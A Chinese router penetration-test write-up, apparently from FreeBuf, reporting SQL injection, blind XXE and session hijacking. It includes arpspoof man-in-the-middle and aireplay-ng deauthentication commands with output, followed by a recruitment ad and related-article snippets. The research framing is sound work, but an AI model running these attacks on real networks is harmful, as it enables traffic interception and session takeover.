对某路由器进行的渗透测试

0×00 固件发布站弱口令+sql注入

fir302b的板子还是比较友好的,拆开能直接看到GND TX RX VCC,虽然没有针脚。
我手头只有一块ttl开发板和三根杜邦线,直接连上UART:

自检结束后,能看到两处post请求,把当前的设备指纹信息、终端账号密码、云账号密码发送到了一个地址

这个url是一个固件发布站,后台存在弱口令

在查询工号处存在注入

昨天测试的时候,发现还有个spring框架的任意文件读取漏洞,今天已经修了

0×01 固件发布站SOAP-based blind xxe

抓路由器的数据包看一下完整的请求

[email protected]:~# nmap -T4 -O 10.8.5.* -vv
Nmap scan report for 10.8.5.232
Host is up, received arp-response (-0.076s latency).
All 1000 scanned ports on 10.8.5.232 are filtered because of 1000 no-responses
MAC Address: F0:EB:D0:54:43:E6 (Shanghai Feixun Communication Co.)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=6.49BETA4%E=4%D=11/14%OT=%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=F0EBD0%TM=58295455%P=x86_64-pc-linux-gnu)
SEQ(II=I)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

[email protected]:~# traceroute baidu.com
traceroute to baidu.com (111.13.101.208), 30 hops max, 60 byte packets
 1  10.8.5.1 (10.8.5.1)  10.091 ms  10.522 ms  10.715 ms
[email protected]:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
[email protected]:~# arpspoof -i eth0 -t 10.8.5.1 10.8.5.232
...
[email protected]:~# arpspoof -i eth0 -t 10.8.5.232 10.8.5.1
...
[email protected]:~# tcpdump -i eth0 -w victim.pcap -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
^C905 packets captured
905 packets received by filter
0 packets dropped by kernel

这里是因为用的交换机,直接混杂模式抓不到包

那么扫上层网段得到路由器IP,然后找到网关,双向欺骗后,重启路由器,tcpdump抓包,等待路由器自检结束

wireshark过滤http请求得到完整数据包

发现能自定义DTD,能加载外部实体:

那么 读一下/var/log/messages

0×02 认证会话劫持漏洞

说起来这算是为了防御arp嗅探泄露cookie而产生的一种漏洞
简单的测试了一下,deauth中断client连接后,session没有立即失效,伪造client mac地址即可进入路由器

[email protected]:~# airmon-ng check kill

Killing these processes:

  PID Name
 1222 wpa_supplicant

[email protected]:~# ifconfig
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:12 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:720 (720.0 B)  TX bytes:720 (720.0 B)

[email protected]:~# airmon-ng start wlan0

PHY    Interface    Driver        Chipset

phy0    wlan0        iwlwifi        Intel Corporation Centrino Ultimate-N 6300 (rev 3e)

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

[email protected]:~# airodump-ng wlan0mon -w picTemp/wifi.csv
 CH  1 ][ Elapsed: 12 s ][ 2016-11-03 14:37

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 F0:EB:D0:54:43:E7  -18        9        2    0  11  54e  WPA2 CCMP   PSK  PHICOMM_5443E7
 3C:8C:40:49:3D:90  -29        3        3    0   1  54e. OPN              mxxz-chinaunicom
 B0:68:B6:F8:A6:18  -30       14        0    0   8  54e. WPA2 CCMP   PSK  moresecret
 D4:EE:07:2B:BE:02  -48       24        3    0   9  54e  WPA2 CCMP   PSK  moresec
 22:C0:90:A8:12:83  -45       23        0    0   6  54e. WPA2 CCMP   PSK  LieBaoWiFi355

[email protected]:~# airodump-ng wlan0mon --bssid F0:EB:D0:54:43:E7 -c 11
CH  7 ][ Elapsed: 36 s ][ 2016-11-03 14:48
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 F0:EB:D0:54:43:E7  -19       26        3    0  11  54e  WPA2 CCMP   PSK  PHICOMM_5443E7  

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 F0:EB:D0:54:43:E7  30:F7:72:41:91:2B  -38    0 - 1     23       15   

[email protected]:~# aireplay-ng -0 0 -a F0:EB:D0:54:43:E7 -c 30:F7:72:41:91:2B wlan0mon
15:04:05  Waiting for beacon frame (BSSID: F0:EB:D0:54:43:E7) on channel 11
15:04:06  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [13|60 ACKs]
15:04:06  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [25|48 ACKs]
15:04:07  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [ 0| 0 ACKs]
15:04:07  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [54| 7 ACKs]
15:04:08  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [56| 0 ACKs]
15:04:09  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [55| 0 ACKs]

几乎是全站静态,密码base64后硬编码在页面中

0×03 广告

此外,影武者实验室长期招猥琐的渗透测试,有经验的安全研究员,以及激灵的小鲜肉实习生。有兴趣请联[email protected]。

*本文作者:影武者实验室,转载请注明来自FreeBuf

时间: 2024-10-22 10:50:42

对某路由器进行的渗透测试的相关文章

渗透测试工具Nmap从初级到高级使用教程

本文由阿德马翻译自国外网站,请尊重劳动成果,转载请注明出处,谢谢 Nmap是一款网络扫描和主机检测的非常有用的工具.Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器.它可以适用于winodws,linux,mac等操作系统.Nmap是一款非常强大的实用工具,可用于: 检测活在网络上的主机(主机发现)检测主机上开放的端口(端口发现或枚举)检测到相应的端口(服务发现)的软件和版本检测操作系统,硬件地址,以及软件版本检测脆弱性的漏洞(Nmap的脚本)Nmap是一个非常普

Kali Linux Web 渗透测试视频教程— 第十六课-拒绝服务攻击

Kali Linux Web 渗透测试视频教程— 第十六课-拒绝服务攻击 文/玄魂 目录 Kali Linux Web 渗透测试视频教程— 第十六课-拒绝服务攻击...................... 1 DoS............................................................................................................... 2 DDoS.......................

Kali Linux无线网络渗透测试教程(大学霸内部资料)

Kali Linux无线网络渗透测试教程(大学霸内部资料) 介绍:本教程全面讲解如何基于Kali Linux对WiFi无线网络进行渗透测试.教程包括无线网络监听.信息收集.路由器渗透测试.客户端渗透测试四大部分.内容涉及网络扫描.Wireshark抓包分析.WPS/WEP/WPA/WAP+Radius破解.漏洞扫描等技术.本教程基于Kali Linux专门讲解针对无线网络WiFi如何进行渗透测试.其中,详细揭示了无线网络的各种安全缺陷和容易被利用的漏洞. Kali Linux无线网络渗透测试 试

一次对SNMP服务的渗透测试

SNMP安全相关信息是需要各位安全开发人员,渗透测试工程师以及白帽子所需要关心的内容,在本篇文章中,作者通过对其漏洞的分析和实践直观的让读者对其相关内容进行了解.对入门学员可能会有所帮助. Hacking SNMP Service – The Post Exploitation :Attacking Network – Network Pentesting原文地址:http://www.websecgeeks.com/2017/ - ce-part-1-post.htmlhttp://www.w

Kail Linux渗透测试教程之ARP侦查Netdiscover端口扫描Zenmap与黑暗搜索引擎Shodan

Kail Linux渗透测试教程之ARP侦查Netdiscover端口扫描Zenmap与黑暗搜索引擎Shodan ARP侦查工具——Netdiscover Netdiscover是一个主动/被动的ARP侦查工具.该工具在不使用DHCP的无线网络上非常有用.使用Netdiscover工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求.下面将介绍Netdiscover工具的使用方法. 首先查看下Netdiscover工具的帮助信息,执行命令如下所示: [email protect

渗透测试工具Nmap从初级到高级

转自:http://www.91ri.org/3550.html 渗透测试工具Nmap从初级到高级 Nmap是一款网络扫描和主机检测的非常有用的工具. Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器.它可以适用于winodws,linux,mac等操作系统.Nmap是一款非常强大的实用工具,可用于: 检测活在网络上的主机(主机发现) 检测主机上开放的端口(端口发现或枚举) 检测到相应的端口(服务发现)的软件和版本 检测操作系统,硬件地址,以及软件版本 检测脆弱性

手把手教你如何搭建自己的渗透测试环境

介绍 白帽子是指个体发起的黑客攻击,找到系统潜在的可能被恶意黑客利用的的漏洞或脆弱点.在目标不知情或者没得到授权的情况下发起黑客攻击是非法的.所以通常是建立一个自己的实验室,练习黑客技术. 在这个实验室里,你能看到如何创建一个自己的黑客环境,练习各种各样的黑客攻击技术.我们将会探讨不同类型的虚拟系统,构建一个虚拟网络,在虚拟环境中运行试用版的操作系统,搭建一个有漏洞的web应用程序,安装Kali LInux,执行渗透测试. 所需条件: VMware Workstation Windows XP系

网站渗透测试原理及详细过程

网站渗透测试原理及详细过程 渗透测试(Penetration Testing)目录 零.前言一.简介二.制定实施方案三.具体操作过程四.生成报告五.测试过程中的风险及规避参考资料FAQ集 零.前言 渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为. 这里我们提供的所有渗透测试方法均为(假设为)合法的评估服务,也就是通常所说的道德黑客行为(Ethical hacking),因此我们这里的所有读者应当都是Ethical Hackers,如果您还不是,那么我希望您到过这里后会成为他们中的

《Web渗透测试使用kali linux》pdf

下载地址:网盘下载 内容简介 <Web渗透测试:使用Kali Linux>是一本Web渗透测试实践指南,全面讲解如何使用Kali Linux对Web应用进行渗透测试.两位安全领域的专家站在攻击者的角度,一步步介绍了渗透测试基本概念.Kali Linux配置方式,带大家了解如何收集信息并发现攻击目标,然后利用各种漏洞发起攻击,并在此基础之上学会渗透测试,掌握补救易受攻击系统的具体技术.此外,书中还给出了撰写报告的最佳实践,其中一些范例可作为撰写可执行报告的模板. <Web渗透测试:使用Ka